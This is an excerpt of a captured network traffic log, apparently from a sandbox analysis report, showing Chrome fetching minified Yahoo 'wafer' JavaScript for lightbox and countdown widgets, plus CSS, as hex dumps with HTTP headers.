                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 6e 26 26 65 28 74 2c 6e 29 2c 74 7d 7d 28 29 2c 70 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2c 66 3d 70 2e 62 61 73 65 2c 64 3d 70 2e 63 6f 6e 73 74 61 6e 74 73 2c 77 3d 70 2e 66 65 61 74 75 72 65 73 2c 62 3d 70 2e 75 74 69 6c 73 2c 79 3d 70 2e 57 61 66 65 72 42 61 73 65 43 6c 61 73 73 2c 67 3d 62 2e 62 69 6e 64 45 76 65 6e 74 2c 76 3d 62 2e 66 69 6e 64 41 6e 63 65 73 74 6f 72 2c 6d 3d 62 2e 67 65 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 73 2c 5f 3d 62 2e 67 65 74 54 65 6d 70 6c 61 74 65 43 6f 6e 74 65 6e 74 2c 43 3d 62 2e 72 65 6d 6f 76 65 54 72 61 6e 73 69 74 69 6f 6e 2c 78 3d 62 2e 73 65 74 54 69 6d 65 6f 75 74 2c 45 3d 62 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 2c 6b 3d 62 2e 75 6e 62 69 6e 64 45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &e(t.prototype,o),n&&e(t,n),t}}(),p=window.wafer,f=p.base,d=p.constants,w=p.features,b=p.utils,y=p.WaferBaseClass,g=b.bindEvent,v=b.findAncestor,m=b.getFocusableElems,_=b.getTemplateContent,C=b.removeTransition,x=b.setTimeout,E=b.setTransition,k=b.unbindE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 76 6f 69 64 20 30 3d 3d 3d 62 3f 30 3a 4e 75 6d 62 65 72 28 62 29 2c 6b 65 79 3a 64 2c 73 65 6c 65 63 74 6f 72 3a 61 2c 73 75 63 63 65 73 73 43 6c 61 73 73 3a 69 2c 74 61 72 67 65 74 3a 66 2c 74 72 69 67 67 65 72 3a 77 2c 77 72 61 70 70 65 72 4d 61 70 3a 63 7d 2c 6d 26 26 28 68 2e 5f 75 74 69 6c 2e 70 61 67 65 54 61 72 67 65 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6d 29 29 2c 68 2e 5f 73 74 61 74 65 3d 75 28 7b 63 6f 6e 74 65 6e 74 4f 62 73 65 72 76 65 72 3a 6e 75 6c 6c 2c 66 69 72 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 6c 61 73 74 46 6f 63 75 73 61 62 6c 65 45 6c 65 6d 3a 6e 75 6c 6c 2c 74 6f 75 63 68 65 6e 64 59 3a 30 2c 74 6f 75 63 68 73 74 61 72 74 59 3a 30 2c 77 69 6c 6c 43 6c 6f 73 65 3a 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: void 0===b?0:Number(b),key:d,selector:a,successClass:i,target:f,trigger:w,wrapperMap:c},m&&(h._util.pageTarget=document.querySelector(m)),h._state=u({contentObserver:null,firstFocusableElem:null,lastFocusableElem:null,touchendY:0,touchstartY:0,willClose:n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 72 20 79 3d 62 3d 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 2d 6c 61 62 65 6c 2d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 3b 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 79 29 7d 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 2c 62 29 7d 73 26 26 28 70 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 29 2c 4d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 77 61 66 65 72 2d 6c 69 67 74 68 62 6f 78 2d 73 6f 75 72 63 65 2d 22 2b 73 2b 22 2d 6f 70 65 6e 22 29 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6d 6f 64 61 6c 22 2c 21 30 29 2c 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 72 6f 6c 65 22 2c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: r y=b="wafer-lightbox-label-"+Date.now();d.setAttribute("id",y)}p.setAttribute("aria-labelledby",b)}s&&(p.classList.add("wafer-ligthbox-source-"+s),M.classList.add("wafer-ligthbox-source-"+s+"-open")),p.setAttribute("aria-modal",!0),p.setAttribute("role",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 2e 74 72 69 67 67 65 72 26 26 74 68 69 73 2e 6f 70 65 6e 28 29 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 53 74 61 72 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 73 74 61 74 65 2e 74 6f 75 63 68 73 74 61 72 74 59 3d 65 2e 63 68 61 6e 67 65 64 54 6f 75 63 68 65 73 5b 30 5d 2e 73 63 72 65 65 6e 59 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 54 6f 75 63 68 4d 6f 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 6f 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 77 72 61 70 70 65 72 4d 61 70 2c 6c 3d 6f 2e 65 6c 65 6d 65 6e 74 54 6f 53 63 72 6f 6c 6c 3b 69 66 28 30 3d 3d 3d 6c 2e 73 63 72 6f 6c 6c 54 6f 70 29 7b 76 61 72 20 72 3d 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this._util.trigger&&this.open())}},{key:"handleTouchStart",value:function(e){this._state.touchstartY=e.changedTouches[0].screenY}},{key:"handleTouchMove",value:function(e){var t=this,o=this._util.wrapperMap,l=o.elementToScroll;if(0===l.scrollTop){var r=e.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 62 6f 75 6e 64 61 72 79 2c 6f 3d 65 2e 65 6c 65 6d 2c 6e 3d 65 2e 74 61 72 67 65 74 2c 6c 3d 65 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 3d 6c 7c 7c 6e 26 26 5f 28 28 74 26 26 76 28 6f 2c 74 29 7c 7c 4d 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 29 29 2c 74 68 69 73 2e 5f 75 74 69 6c 2e 74 65 6d 70 6c 61 74 65 54 65 78 74 7d 7d 5d 29 2c 74 7d 28 79 29 3b 41 2e 65 76 65 6e 74 73 3d 7b 63 6c 69 63 6b 3a 5b 5b 22 77 61 66 65 72 2d 6c 69 67 68 74 62 6f 78 22 2c 22 68 61 6e 64 6c 65 43 6c 69 63 6b 22 5d 5d 7d 3b 76 61 72 20 50 3d 41 2c 59 3d 4f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,get:function(){var e=this._util,t=e.boundary,o=e.elem,n=e.target,l=e.templateText;return this._util.templateText=l||n&&_((t&&v(o,t)||M).querySelector(n)),this._util.templateText}}]),t}(y);A.events={click:[["wafer-lightbox","handleClick"]]};var P=A,Y=Obje
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 62 69 6e 64 45 76 65 6e 74 2c 58 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 62 61 73 65 2c 7a 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 47 3d 64 6f 63 75 6d 65 6e 74 2c 51 3d 47 2e 62 6f 64 79 2c 5a 3d 47 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 24 3d 22 73 63 72 6f 6c 6c 22 3d 3d 3d 77 69 6e 64 6f 77 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 76 65 72 66 6c 6f 77 59 3f 51 3a 5a 2c 65 65 3d 76 6f 69 64 20 30 2c 74 65 3d 76 6f 69 64 20 30 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: bindEvent,X=window.wafer.base,z=window.wafer.controllers.WaferBaseController,G=document,Q=G.body,Z=G.documentElement,$="scroll"===window.getComputedStyle(document.body).overflowY?Q:Z,ee=void 0,te=void 0,oe=function(e){function t(){var e=arguments.length>0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 2c 7b 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 29 29 2c 79 2e 5f 73 74 61 74 65 2e 6c 61 73 74 53 63 72 6f 6c 6c 59 3d 65 2c 79 2e 5f 73 74 61 74 65 2e 63 75 72 72 65 6e 74 49 6e 73 74 61 6e 63 65 3d 74 68 69 73 2c 79 2e 5f 73 74 61 74 65 2e 6f 70 65 6e 3d 21 30 7d 2c 50 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 6e 64 6c 65 53 77 69 70 65 43 6c 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 79 2e 5f 63 6c 6f 73 65 28 7b 73 6f 75 72 63 65 3a 22 73 77 69 70 65 43 6c 6f 73 65 22 7d 29 7d 2c 62 2e 5f 72 65 6e 64 65 72 4c 69 67 68 74 42 6f 78 57 72 61 70 70 65 72 28 29 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 63 28 74 2c 65 29 2c 42 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ,{overflow:"hidden"})),y._state.lastScrollY=e,y._state.currentInstance=this,y._state.open=!0},P.prototype.handleSwipeClose=function(){y._close({source:"swipeClose"})},b._renderLightBoxWrapper(),b.sync(),b}return c(t,e),B(t,[{key:"_close",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 65 6e 74 28 22 6c 69 67 68 74 62 6f 78 3a 63 6c 6f 73 65 22 2c 7b 65 6c 65 6d 3a 69 2c 6d 65 74 61 3a 7b 73 6f 75 72 63 65 3a 6e 2c 74 61 72 67 65 74 45 6c 65 6d 3a 66 7d 7d 29 7d 2c 70 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 5f 63 6c 6f 73 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 42 67 43 6c 6f 73 65 43 6c 69 63 6b 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 2e 70 72 6f 70 73 2e 77 72 61 70 70 65 72 4d 61 70 2c 6f 3d 74 2e 77 72 61 70 70 65 72 45 6c 65 6d 3b 65 2e 74 61 72 67 65 74 3d 3d 3d 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ent("lightbox:close",{elem:i,meta:{source:n,targetElem:f}})},p)}}},{key:"_handleCloseClick",value:function(e){e.preventDefault(),this._close()}},{key:"_handleBgCloseClick",value:function(e){var t=this._options.props.wrapperMap,o=t.wrapperElem;e.target===o


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              118192.168.2.45114287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:42 UTC369OUTGET /aaq/wf/wf-countdown-1.2.5-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: LVIPqXVsuqGS3MSeQYP6q0C0PZEeDUAiHELdYHIYU+BiwOyA2wdV3GmJC5vn+IcPBY1r0lRH12MAepjESUAyH1laSx+6qDTa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: EP4XVGPM20C31VFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 01:10:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Sep 2020 18:50:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "681d57e9e7cbef5de44544c13f8ca62e"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=315360000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: CQ1lP8549yVnp28g4QLu9GcN8rB3ImgO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 496990
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-countdown",[],t):"object"==typeof exports?exports["wafer-countdown"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 65 78 65 63 28 6e 29 2c 73 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 5b 31 5d 3b 73 26 26 28 6e 3d 73 29 7d 69 66 28 6e 29 7b 76 61 72 20 75 3d 6c 28 6e 29 2c 69 3d 6e 65 77 20 4d 61 70 3b 75 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 73 65 74 28 65 2c 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 2d 22 2b 65 29 5b 30 5d 29 7d 29 3b 76 61 72 20 66 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 66 2d 63 6f 75 6e 74 64 6f 77 6e 2d 65 6e 64 64 61 74 65 22 29 3b 66 26 26 69 2e 73 69 7a 65 3d 3d 3d 75 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 73 65 74 75 70 43 6f 75 6e 74 28 69 2c 66 2c 6f 29 7d 7d 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: exec(n),s=Array.isArray(a)&&a[1];s&&(n=s)}if(n){var u=l(n),i=new Map;u.forEach(function(e){i.set(e,t.getElementsByClassName("wafer-countdown-"+e)[0])});var f=t.getAttribute("data-wf-countdown-enddate");f&&i.size===u.length&&this.setupCount(i,f,o)}}return
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC448INData Raw: 74 54 69 6d 65 49 6e 74 65 72 76 61 6c 29 7d 7d 5d 29 2c 65 7d 28 29 2c 70 3d 77 2c 68 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 73 2e 57 61 66 65 72 42 61 73 65 43 6f 6e 74 72 6f 6c 6c 65 72 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 6e 3d 65 2e 72 6f 6f 74 2c 72 3d 76 6f 69 64 20 30 3d 3d 3d 6e 3f 64 6f 63 75 6d 65 6e 74 3a 6e 2c 73 3d 65 2e 73 65 6c 65 63 74 6f 72 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 73 3f 22 2e 77 61 66 65 72 2d 63 6f 75 6e 74 64 6f 77 6e 22 3a 73 3b 6f 28 74 68 69 73 2c 74 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: tTimeInterval)}}]),e}(),p=w,h=window.wafer.controllers.WaferBaseController,y=function(e){function t(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=e.root,r=void 0===n?document:n,s=e.selector,u=void 0===s?".wafer-countdown":s;o(this,t)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              119192.168.2.45114787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC625OUTGET /aaq/fp/css/react-wafer-weather.WeatherPreviewRefresh.atomic.ltr.2a251a0ddb3d7c4ec13f4e35ee35dd2b.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC726INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: QzQ6Vasafi35M8T90a1GgpOx1HnXuVN+vM+VTnpEHVrQkoNXhhE4OrX9nn5+xx8SBMd8rOEb2wvh8FRvr+JWEadldkD9rOMk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: TQMB2JM4X15JBTWC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Wed, 02 Oct 2024 02:00:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 15 Dec 2023 14:53:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "2a251a0ddb3d7c4ec13f4e35ee35dd2b"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: kLRcmlvLyRbY_VAaft68F.xlsYWQ5D50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 5570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 580412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 23 61 74 6f 6d 69 63 20 2e 41 69 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 2d 2d 70 65 62 62 6c 65 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 37 63 64 64 32 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 65 62 62 6c 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 74 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 64 74 63 5c 28 2d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: #atomic .Ai\(c\){align-items:center}#atomic .Bdc\(--dirty-seagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull)}#atomic .Bdc\(--pebble\){border-color:#c7cdd2;border-color:var(--pebble)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdtc\(-
